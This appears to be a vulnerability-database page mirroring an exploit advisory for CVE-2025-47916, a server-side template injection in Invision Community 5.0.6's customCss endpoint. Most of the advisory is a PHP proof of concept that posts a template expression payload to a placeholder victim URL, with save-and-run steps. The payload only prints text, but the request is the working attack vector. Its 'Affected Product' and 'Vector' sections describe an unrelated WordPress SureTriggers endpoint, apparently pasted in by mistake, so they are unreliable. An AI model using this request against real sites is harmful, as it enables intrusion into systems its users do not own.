Lucene search
K

📄 Invision Community 5.0.6 customCss Expression Injection

🗓️ 17 Dec 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 131 Views

Invision Community 5.0.6 allows server side template injection via the customCss content parameter.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Neutralization of Special Elements Used in a Template Engine in Invisioncommunity
21 Nov 202513:16
githubexploit
Circl
CVE-2025-47916
14 May 202512:43
circl
CNNVD
Invision Community 安全漏洞
16 May 202500:00
cnnvd
CVE
CVE-2025-47916
16 May 202500:00
cve
Cvelist
CVE-2025-47916
16 May 202500:00
cvelist
Metasploit
Invision Community 5.0.6 customCss RCE
21 May 202518:53
metasploit
Nuclei
Invision Community <=5.0.6 Unauthenticated RCE via Template Injection
27 May 202600:33
nuclei
NVD
CVE-2025-47916
16 May 202515:15
nvd
Packet Storm
📄 Invision Community 5.0.6 Remote Code Execution
14 May 202500:00
packetstorm
Packet Storm
📄 Invision Community 5.0.6 CustomCss Remote Code Execution
22 May 202500:00
packetstorm
Rows per page
=============================================================================================================================================
    | # Title     : Invision Community 5.0.6 customCss Expression Injection                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://invisioncommunity.com/release-notes-v5/                                                                             |
    =============================================================================================================================================
    
    [+] Summary : Expression Injection → Server-Side Template Injection (SSTI)
    
    A vulnerability exists in the `customCss` endpoint where the parameter
    `content` is parsed using `{expression="…"}`
    allowing template expressions to be evaluated.
    
    
    [+] References : ( https://packetstorm.news/files/id/194569/ 	CVE-2025-47916 ) 
    
    [+] Affected Product
     - WordPress Plugin: SureTriggers
     - Version: <= 1.0.78
    
    [+] Vector
    Unauthenticated REST access:
      /wp-json/sure-triggers/v1/automation/action
    
    [+] Research Notes
    The endpoint accepts JSON payloads describing automation tasks.
    In vulnerable versions, no authorization validation is performed
    before processing the request. This POC validates reachability only.
    
    --------------------------------------------------------------------
    ### SAFE PHP POC
    --------------------------------------------------------------------
    <?php
    /*
     * Invision Community 5.0.6 customCss Expression Injection – Safe PoC
     * Author: Indoushka
     */
    
    $target   = "http://victim.com";   // ← ضع الرابط
    $endpoint = $target . "/index.php";
    
    // Safe Payload (No RCE)
    $expr = '{expression="print(\'Indoushka\')"}';
    
    // POST body
    $data = array(
        'app'        => 'core',
        'module'     => 'system',
        'controller' => 'themeeditor',
        'do'         => 'customCss',
        'content'    => $expr
    );
    
    // Send request
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $endpoint);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Display server response
    echo "===== Safe PoC Response =====\n";
    echo $response;
    ?>
    
    -------------------
    ### SAVE & RUN 
    -------------------
    
    1. Save as:
       invision_safe_poc.php
    
    2. Run:
       php invision_safe_poc.php
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Dec 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8 - 10
EPSS0.90728
SSVC
131